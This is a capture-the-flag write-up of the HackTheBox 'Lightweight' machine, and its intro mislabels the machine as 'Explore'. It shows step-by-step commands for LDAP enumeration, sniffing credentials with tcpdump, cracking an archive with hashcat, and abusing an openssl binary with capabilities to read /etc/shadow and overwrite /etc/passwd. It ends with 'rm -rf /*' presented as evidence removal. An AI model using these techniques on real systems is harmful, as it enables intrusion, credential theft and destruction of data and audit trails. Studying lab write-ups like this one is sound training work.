Lightweight

Tags: #Linux #Enumeration #LDAP #Wireshark #Pivoting

Explore is an medium-rated Linux machine from HackTheBox created by 0xEA31. In the current post, my IP is 10.10.14.32, and the target IP is 10.129.95.236.

I liked this machine a lot, more than just researching to find a specific CVE or something like that. In the beginning, the machine is open; you can get in without effort and then use various techniques to pivot between many users. It's a good LDAP practice.

Recon

First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

Local Terminal

$ ping -c 1 10.129.95.236

Pinging 10.129.95.236 with 32 bytes of data:
Reply from 10.129.95.236: bytes=32 time=144ms TTL=63
Reply from 10.129.95.236: bytes=32 time=148ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63
Reply from 10.129.95.236: bytes=32 time=142ms TTL=63

Ping statistics for 10.129.95.236:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 142ms, Maximum = 148ms, Average = 144ms

By the TTL, we assume that is a Linux Machine (value around 64)

-p- --open to scan all open port
-T5 Scan at max speed, a little bit noisy
-v verbose, return more information while scanning
-n Scan don’t apply DNS resolution, more speed.

Local Terminal

$ nmap -p- --open -T5 -v -n 10.129.95.236 -oG Ports

Completed SYN Stealth Scan at 09:30, 258.48s elapsed (65535 total ports)
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).
Not shown: 65273 filtered tcp ports (no-response), 259 filtered tcp ports (host-prohibited)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 259.02 seconds
           Raw packets sent: 131004 (5.764MB) | Rcvd: 301 (20.480KB)

-sC Basic Nmap scripts.
-sV Return versions of the services.

Local Terminal

$ nmap -sCV -p 22,80,389 10.129.95.236 -oN Target

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 09:32 Pacific SA Standard Time
Nmap scan report for 10.129.95.236
Host is up (0.15s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds

Important information: {Domain : lightweight.htb}, modify your host file to add that domain to the target IP.

Local Terminal

$ whatweb http://10.129.95.236
http://10.129.95.236 [200 OK] Apache[2.4.6][mod_fcgid/2.3.9], Country[RESERVED][ZZ], 
HTML5, HTTPServer[CentOS][Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16], 
IP[10.129.95.236], OpenSSL[1.0.2k-fips], PHP[5.4.16], Script, Title[Lightweight slider evaluation page - slendr], 
X-Powered-By[PHP/5.4.16]

Browser: http://10.129.95.236

So, we will be blocked if we try brute force, this apply to dictionary attacks too. At this point, we have to explore the website through view:source (CTRL+U).

At the source code, there is a js/index.js, is always a good idea to check with the browser, in case of Directory Listing.

Browser: http://10.129.95.236/js/index.js

Nothing relevant.

Browser: http://10.129.95.236/js

It has the capability of Directory Listing, but there is nothing else… Ok, let's explore the website

Browser: http://10.129.95.236/info.php
- By clicking on INFO

Browser: http://10.129.95.236/status.php
- By clicking on Status

Browser: http://10.129.95.236/user.php

That is an interesting statement, we can login using SSH with our IP address as username and password.

By hovering, we can find that there is a new url, http://10.129.95.236/reset.php, it says that is just for reset our username and password, so nothing to worry about.

But first, LDAP Enumeration

LDAP Enumeration

If we use at the terminal locate .nse we will enumerate every nmap script, but here the goal it's to execute every LDAP related script, we can add a filter by using locate .nse | grep ldap

Local Terminal

nmap --script ldap-brute.nse,ldap-novell-getpass.nse,ldap-rootdse.nse,ldap-search.nse -p389 10.129.95.236 -oN LdapScan

Bug in ldap-brute: no string output.
PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search:
|   Context: dc=lightweight,dc=htb
|     dn: dc=lightweight,dc=htb
|         objectClass: top
|         objectClass: dcObject
|         objectClass: organization
|         o: lightweight htb
|         dc: lightweight
|     dn: cn=Manager,dc=lightweight,dc=htb
|         objectClass: organizationalRole
|         cn: Manager
|         description: Directory Manager
|     dn: ou=People,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: People
|     dn: ou=Group,dc=lightweight,dc=htb
|         objectClass: organizationalUnit
|         ou: Group
|     dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser1
|         cn: ldapuser1
|         sn: ldapuser1
|         mail: ldapuser1@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1000
|         gidNumber: 1000
|         homeDirectory: /home/ldapuser1
|     dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
|         uid: ldapuser2
|         cn: ldapuser2
|         sn: ldapuser2
|         mail: ldapuser2@lightweight.htb
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: inetOrgPerson
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: shadowAccount
|         userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
|         shadowLastChange: 17691
|         shadowMin: 0
|         shadowMax: 99999
|         shadowWarning: 7
|         loginShell: /bin/bash
|         uidNumber: 1001
|         gidNumber: 1001
|         homeDirectory: /home/ldapuser2
|     dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser1
|         userPassword: {crypt}x
|         gidNumber: 1000
|     dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: ldapuser2
|         userPassword: {crypt}x
|_        gidNumber: 1001
| ldap-rootdse:
| LDAP Results
|   <ROOT>
|       namingContexts: dc=lightweight,dc=htb
|       supportedControl: 2.16.840.1.113730.3.4.18
|       supportedControl: 2.16.840.1.113730.3.4.2
|       supportedControl: 1.3.6.1.4.1.4203.1.10.1
|       supportedControl: 1.3.6.1.1.22
|       supportedControl: 1.2.840.113556.1.4.319
|       supportedControl: 1.2.826.0.1.3344810.2.3
|       supportedControl: 1.3.6.1.1.13.2
|       supportedControl: 1.3.6.1.1.13.1
|       supportedControl: 1.3.6.1.1.12
|       supportedExtension: 1.3.6.1.4.1.1466.20037
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.1
|       supportedExtension: 1.3.6.1.4.1.4203.1.11.3
|       supportedExtension: 1.3.6.1.1.8
|       supportedLDAPVersion: 3
|_      subschemaSubentry: cn=Subschema

There is a lot of information, but the password are not decryptable.

User Pivot

SSH by using IP

Before the website told us that it is possible to login by using your IP as username and password.

Local Terminal

ssh 10.10.14.32@10.129.95.236

[10.10.14.32@lightweight ~]$ whoami
10.10.14.32

And… we are in, and we even have a new directory…

Target Terminal [10.10.14.32]

$ cd ..

$ ls -l
total 0
drwx------. 4 10.10.14.2  10.10.14.2   91 Nov 16  2018 10.10.14.2
drwx------. 4 10.10.14.32 10.10.14.32  91 May 26 15:04 10.10.14.32
drwx------. 2 127.0.0.1   127.0.0.1    62 Sep 27  2021 127.0.0.1
drwx------. 4 ldapuser1   ldapuser1   181 Sep 27  2021 ldapuser1
drwx------. 4 ldapuser2   ldapuser2   197 Sep 27  2021 ldapuser2

There are more users? And by seeing the permission (drwx------), we are not able to do anything here… We need to go further.

Target Terminal [10.10.14.32]

$ grep "sh$" /etc/passwd
root:x:0:0:root:/root:/bin/bash
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
127.0.0.1:x:1003:1003::/home/127.0.0.1:/bin/bash
10.10.14.32:x:1004:1004::/home/10.10.14.32:/bin/bash

Yes, those are users, perfect targets for User Pivoting.

Target Terminal [10.10.14.32]

$ uname -a
Linux lightweight.htb 3.10.0-862.3.3.el7.x86_64 #1 SMP Fri Jun 15 04:15:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/os-release
NAME="CentOS Linux" # Nothing suspicious here.
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

It is necessary to get more information about the target.

Target Terminal [10.10.14.32]

$ cd /

$ find \-perm -4000 2>/dev/null | xargs ls -l
-rwsr-xr-x. 1 root root     52952 Apr 11  2018 ./usr/bin/at
-rwsr-xr-x. 1 root root     64240 Nov  5  2016 ./usr/bin/chage
-rws--x--x. 1 root root     24048 Apr 11  2018 ./usr/bin/chfn
-rws--x--x. 1 root root     23960 Apr 11  2018 ./usr/bin/chsh
-rwsr-xr-x. 1 root root     57576 Apr 11  2018 ./usr/bin/crontab
-rwsr-xr-x. 1 root root     32008 Apr 11  2018 ./usr/bin/fusermount
-rwsr-xr-x. 1 root root     78216 Nov  5  2016 ./usr/bin/gpasswd
-rwsr-xr-x. 1 root root     44320 Apr 11  2018 ./usr/bin/mount
-rwsr-xr-x. 1 root root     41776 Nov  5  2016 ./usr/bin/newgrp
-rwsr-xr-x. 1 root root     27832 Jun 10  2014 ./usr/bin/passwd
-rwsr-xr-x. 1 root root     27680 Apr 11  2018 ./usr/bin/pkexec
---s--x---. 1 root stapusr 203832 Apr 12  2018 ./usr/bin/staprun
-rwsr-xr-x. 1 root root     32184 Apr 11  2018 ./usr/bin/su
---s--x--x. 1 root root    143184 Apr 11  2018 ./usr/bin/sudo
-rwsr-xr-x. 1 root root     32048 Apr 11  2018 ./usr/bin/umount
-rwsr-xr-x. 1 root root     15432 Apr 11  2018 ./usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-sr-x. 1 abrt abrt     15432 Apr 27  2018 ./usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x---. 1 root dbus     58016 Apr 11  2018 ./usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root     11216 Apr 11  2018 ./usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root     36280 Apr 11  2018 ./usr/sbin/unix_chkpwd
-rws--x--x. 1 root root     40312 Jun  9  2014 ./usr/sbin/userhelper
-rwsr-xr-x. 1 root root     11288 Apr 11  2018 ./usr/sbin/usernetctl

List of SUID privileges, there is nothing critical. And we are not able to modify one of these files or execute them as temporal root

Target Terminal [10.10.14.32]

$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep #Interesting...

Network Capture

by checking capabilities, we found TCPdump, and that is interesting to play with specially because we can execute an account reset at reset.php to trigger an interaction with us.

Target Terminal [10.10.14.32]

$ cd /tmp/

$ tcpdump -i any -w Capture.cap -v # Just a test, you can try "which tcpdump" too

$ rm Capture.cap

-i any Any Interface
-w Save the output as:
-v Verbose

It was just a test, now the best option is to open a new local terminal or Wireshark to scan a TCPDump sent by the target.

Target Terminal [10.10.14.32]

$ tcpdump -i lo port 389 -w capture.cap -v

Now play at the website, navigate everywhere, press all the buttons, and the most important thing, execute the reset.php command.

You have to download the capture.cap file and explore the content with Wireshark

Local Terminal

$ scp 10.10.14.32@10.129.95.236:/tmp/capture.cap capture.cap
      # Password: 10.10.14.32
$ wireshark capture.cap

Open the capture.cap file with Wireshark and search for Protocol LDAP. Then right click over the packet > Follow > TCP Sequence

We have new information, {username: ldapuser2 @ password : 8bc8251332abe1d7f105d3e53ad39ac2}, now return to the Target Terminal.

Target Terminal [10.10.14.32]

$ su - ldapuser2
Password: # 8bc8251332abe1d7f105d3e53ad39ac2

[ldapuser2@lightweight ~]$ cat user.txt
2f3954743b5446b603d25d0a8956c741

Privileges Escalation

User Pivot II

Target Terminal [ldapuser2]

$ ls -l

total 1868
-rw-r--r--. 1 root      root         3411 Jun 14  2018 backup.7z
-rw-rw-r--. 1 ldapuser2 ldapuser2 1520530 Jun 13  2018 OpenLDAP-Admin-Guide.pdf
-rw-rw-r--. 1 ldapuser2 ldapuser2  379983 Jun 13  2018 OpenLdap.pdf
-rw-r--r--. 1 root      root           33 May 26 14:10 user.txt

Look what we found, a backup file… take it by using the TargetSSH terminal and a LocalTerminal... Copy all the content

Target Terminal [ldapuser2]

base64 -w 0 backup.7z ; echo

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

Local Terminal

echo "<All the content>" | base64 -d > backup.7z

If you want, compare the hash with md5sum in both terminals to check if the file is the same… now try to unpack.

Local Terminal

$ /usr/src/john/run/7z2john.pl backup.7z > hash
# If this fails, try: "apt-get install -y libcompress-raw-lzma-perl"

$ hashcat --example-hashes | grep -A 2 -B 2 7-Zip

Hash mode #11600
  Name................: 7-Zip
  Category............: Archive
  Slow.Hash...........: Yes
  
$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt

$ vi hash

Delete the marked part from the file "hash"

Local Terminal

$ hashcat -m 11600 hash /usr/share/wordlists/rockyou.txt

Now that we have the content of the webpage, we can explore the whole.

Local Terminal

$ 7z x backup.7z

$ cat index.php #Nothing
$ cat info.php #Nothing
$ cat reset.php #Nothing
$ cat status.php # :o

<...>
  22   │ <?php
  23   │ $username = 'ldapuser1';
  24   │ $password = 'f3ca9d298a553da117442deeb6fa932d';
  25   │ $ldapconfig['host'] = 'lightweight.htb';
  26   │ $ldapconfig['port'] = '389';
  27   │ $ldapconfig['basedn'] = 'dc=lightweight,dc=htb';
  28   │ //$ldapconfig['usersdn'] = 'cn=users';
  29   │ $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']);
  30   │ ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3);
  31   │ ldap_set_option($ds, LDAP_OPT_REFERRALS, 0);
  32   │ ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10);
  33   │
  34   │ $dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<...>

New information: {username : ldapuser1 @ password : f3ca9d298a553da117442deeb6fa932d }, now return to the Target Terminal

Target Terminal [ldapuser2]

[ldapuser2@lightweight ~]$ su - ldapuser1
Password:  # f3ca9d298a553da117442deeb6fa932d 

[ldapuser1@lightweight ~]$ whoami
ldapuser1

Root

Target Terminal [ldapuser1]

[ldapuser1@lightweight ~]$ id
uid=1000(ldapuser1) gid=1000(ldapuser1) groups=1000(ldapuser1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[ldapuser1@lightweight ~]$ sudo -l
[sudo] password for ldapuser1:
Sorry, user ldapuser1 may not run sudo on lightweight.

[ldapuser1@lightweight ~]$ getcap -r *
openssl =ep
tcpdump = cap_net_admin,cap_net_raw+ep

Openssl with capabilities, we can make use of it, go to https://gtfobins.github.io/gtfobins/openssl/#file-read and try to abuse from that

Target Terminal [ldapuser1]

# Testing the exploit
[ldapuser1@lightweight ~]$ cat /etc/shadow
cat: /etc/shadow: Permission denied

[ldapuser1@lightweight ~]$ ./openssl enc -in "/etc/shadow"
root:$6$eVOz8tJs$xpjymy5BFFeCIHq9a.BoKZeyPReKd7pwoXnxFNOa7TP5ltNmSDsiyuS/ZqTgAGNEbx5jyZpCnbf8xIJ0Po6N8.:17711:0:99999:7:::
bin:*:17632:0:99999:7:::
daemon:*:17632:0:99999:7:::
<...>

Target Terminal [ldapuser1]

[ldapuser1@lightweight ~]$ ./openssl enc -in "/root/root.txt"
59e97417b2a124939865fe588a731e8b

We could even get the flag by this way, But we want to do a privilege scalation by modifying the root's password… let's go to https://gtfobins.github.io/gtfobins/openssl/#file-write to modify /etc/passwd

Target Terminal [ldapuser1]

$ cd ~

$ cp /etc/passwd passwd

$ openssl passwd   # Here I used 'hello' as password
Password: #hello
Verifying - Password: # hello
z4oRRkp3WBrCc # Save this

Local Terminal

$ hashid z4oRRkp3WBrCc
Analyzing 'z4oRRkp3WBrCc'
[+] DES(Unix)
[+] Traditional DES
[+] DEScrypt

Target Terminal [ldapuser1]

$ nano passwd

Replace the "X" with "z4oRRkp3WBrCc"

With this, the machine will not extract the password from /etc/shadow and decrypt with SHA512 {Check with at TargetSSH: grep "ENCRYPT_METHOD" /etc/login.defs}, and just read it from passwd… with the capability in the Openssl, we will replace the password file.

Target Terminal [ldapuser1]

$ cat passwd | ./openssl enc -out /etc/passwd
# No message, it works.
$ cat /etc/passwd
root:z4oRRkp3WBrCc:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
<...>

$ su root #using hello as password

Target Terminal [root]

$ cd /root
$ cat /root/root.txt

$ rm -rf /* # To remove all the evidence

PreviousJarvis NextMagic

Last updated 2 years ago